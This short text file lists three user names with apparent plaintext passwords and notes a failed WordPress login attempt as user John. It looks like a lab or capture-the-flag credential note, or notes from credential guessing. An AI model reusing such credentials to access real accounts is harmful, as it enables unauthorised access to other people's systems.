Dave:damachine
Elly:ylle
ZOE:partyqueen
wordpress login username John, password incorrect